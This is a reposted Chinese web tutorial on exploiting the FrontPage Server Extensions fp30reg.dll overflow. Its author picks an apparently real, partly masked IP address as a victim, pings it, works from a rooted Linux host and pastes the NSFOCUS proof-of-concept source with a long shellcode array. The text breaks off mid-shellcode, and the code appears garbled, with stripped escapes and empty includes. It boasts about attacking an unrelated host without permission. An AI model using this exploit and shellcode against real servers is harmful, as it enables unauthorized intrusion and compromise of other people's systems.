 |
建站必读 |
 |
|
|
 |
|
 |
|
| |
| 当前位置:首页 -> 建站必读 -> ASP技术 |
|
Front page server溢出攻击实例 《转》 |
Front page server溢出攻击实例<<原创>>
下 载:http://www.nsfocus.com/proof/fpse2000ex.c
哈哈~大家好!!~(一上来就骂人??!)危卵~真实越来越"厉害"了,全一段时间的.printer硝烟未尽,现在又出来一个frontpage server fp30reg.dll溢出漏洞~不过便宜新手们了……(嘿嘿~!)关于该漏洞的资料看本站上面的公告!(Bytes~!废话好多!)
言归正传..今天我给大家讲讲怎么利用..
先找一个,小羊羔~~(啊~小鬼子又进村了!!~?)嗯~~~谁呢??就你吧---61.153.xxx.xxx(国内的~别抓我啊~!!我不想坐牢!!).ping一下先,别timed out!就GOD!!!了~哈哈!:
Pinging 61.153.xxx.xxxwith 32 bytes of data:
Reply from 61.153.xxx.xx: bytes=32 time=36ms TTL=124
Reply from 61.153.xxx.xx: bytes=32 time=35ms TTL=124
Reply from 61.153.xxx.xx: bytes=32 time=35ms TTL=124
………………(啊哈~!速度不错~不拿你开刀我都找不到理由~!~哈哈~!我邪恶吗??)
Let me start...
telnet 211.100.xxx.xxx(My fat hen,haha)
Red Hat Linux release 7.0.1J (Guinness)(羡慕吧??~~哈哈)
Kernel 2.2.16-22 on an i686
login: bytes
passwd:xxxxxxx(当然不告诉你la)
[root@glb-linux-1 bytes]#id
uid=0 (root) gid=2513(other)(嘿嘿~@!)
[root@glb-linux-1 bytes]# vi kill.c (copy来原码,顺便说一句,这段程序很漂亮~!!)
/*
* fpse2000ex.c - Proof of concept code for fp30reg.dll overflow bug.
* Copyright (c) 2001 - Nsfocus.com
*
* DISCLAIMS:
* This is a proof of concept code. This code is for test purpose
* only and should not be run against any host without permission from
* the system administrator.
*
* NSFOCUS Security Team
* http://www.nsfocus.com
*/
/* # 前面这里是版权信息,以及程序说明*/
#include
#include
#include
#include
#include
#include
#include
#include
/* fat shellcode */
/* # shellcode比较多 */
char shellcode[] =
"xebx1ax5fx56x56x57x5ex33xc9xacx3axc1x74x13x3cx30x74x5x34"
"xaaxaaxebxf2xacx2cx40xebxf6xe8xe1xffxffxffxffx21x46x2bx46"
"xb6xa3xaaxaaxf9xfcxfdx27x17x4ex5cx55x55x13xedxa8xaaxaax12"
"x66x66x66x66x59x1x6dx2fx66x5dx55x55xaaxaaxaaxaax21xefxa2"
"x21x22x2exaaxaaxaax23x27x62x5dx55x55x21xffxa2x21x28x22xaa"
"xaaxaax23x2fx6ex5dx55x55x21xe7xa2x21xfbxa2x23x3fx6ax5dx55"
"x55x43x61xafxaaxaax25x2fx16x5dx55x55x27x17x5ax5dx55x55xce"
"xbxaaxaaxaaxaax23xedxa2xcex23x97xaaxaaxaaxaax6dx2fx5ax5d"
"x55x55x55x55x55x55x21x2fx16x5dx55x55x29x42xadx23x2fx5ex5d"
"x55x55x6dx2fx12x5dx55x55xaaxaax4axddx42xcdxafxaaxaax29x17"
"x66x5dx55x55xaaxa5x2fx77xabxaaxaax21x27x12x5dx55x55x2bx6b"
"xaaxaaxabxaax23x27x12x5dx55x55x2bx17x12x5dx55x55xaaxaaxaa"
"xd2xdfxa0x6dx2fx12x5dx55x55xaaxaax5ax15x21x3fx12x5dx55x55"
"x99x6axccx21xa8x97xe7xf0xaaxaaxa5x2fx30x70xabxaaxaax21x27"
"x12x5dx55x55x21xfbx96x21x2fx12x5dx55x55x99x63xccx21xa6xba"
"x2bx53xfaxefxaaxaaxa5x2fxd3xabxaaxaax21x3fx12x5dx55x55x21"
"xe8x96x21x27x12x5dx55x55x21xfexabxd2xa9x3fx12x5dx55x55x23"
"x3fx1ex5dx55x55x21x2fx1ex5dx55x55x21xe2xa6xa9x27x12x5dx55"
"x55x23x27x6x5dx55x55x21x3fx6x5dx55x55x2bx90xe1xefxf8xe4xa5"
"x2fx99xabxaaxaax21x2fx6x5dx55x55x2bxd2xaexefxe6x99x98xa5"
&qu |
| |
|
| |
本站关键词: |
|
|
|
|
 |
|
 |
|